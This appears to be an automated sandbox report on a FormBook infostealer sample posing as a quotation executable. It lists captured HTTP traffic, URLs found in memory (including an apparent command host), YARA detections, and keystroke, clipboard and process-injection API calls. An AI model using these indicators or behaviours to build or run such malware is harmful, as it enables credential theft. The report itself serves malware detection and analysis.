2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:20 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:23 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:25 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4090192746.00000000050BB000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hsck520.com
Source: KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4090192746.00000000050BB000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hsck520.com/2e2r/
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://cdn.livechatinc.com/tracking.js
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RMActivate_ssp.exe, 00000003.00000003.1943583969.0000000007DD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://track.uc.cn/collect
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000003D54000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002FD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://v-cn.vaptcha.com/v3.js
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000003D54000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002FD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.livechat.com/?welcome
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000003D54000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002FD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.livechat.com/chat-with/14282961/

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_0098425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0098425A

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00984458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00984458

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

0_2_0098425A

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00970219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00970219

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_0099CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0099CDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00913B4C
Source: PTT Group project - Quotation.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PTT Group project - Quotation.exe, 00000000.00000000.1639356848.00000000009C5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_39eed2da-6
Source: PTT Group project - Quotation.exe, 00000000.00000000.1639356848.00000000009C5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_763a666a-c
Source: PTT Group project - Quotation.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8ffd7825-5
Source: PTT Group project - Quotation.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_8fbf1156-6

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PTT Group project - Quotation.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042B003 NtClose,	1_2_0042B003
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872B60 NtClose,LdrInitializeThunk,	1_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk,	1_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03874340 NtSetContextThread,	1_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03874650 NtSuspendThread,	1_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872B80 NtQueryInformationFile,	1_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872BA0 NtEnumerateValueKey,	1_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872BE0 NtQueryValueKey,	1_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872BF0 NtAllocateVirtualMemory,	1_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872AB0 NtWaitForSingleObject,	1_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872AD0 NtReadFile,	1_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872AF0 NtWriteFile,	1_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872F90 NtProtectVirtualMemory,	1_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872FA0 NtQuerySection,	1_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872FB0 NtResumeThread,	1_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872FE0 NtCreateFile,	1_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872F30 NtCreateSection,	1_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872F60 NtCreateProcessEx,	1_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872E80 NtReadVirtualMemory,	1_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872EA0 NtAdjustPrivilegesToken,	1_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872EE0 NtQueueApcThread,	1_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872E30 NtWriteVirtualMemory,	1_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872DB0 NtEnumerateKey,	1_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872DD0 NtDelayExecution,	1_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872D00 NtSetInformationFile,	1_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872D10 NtMapViewOfSection,	1_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872D30 NtUnmapViewOfSection,	1_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872CA0 NtQueryInformationToken,	1_2_03872CA0
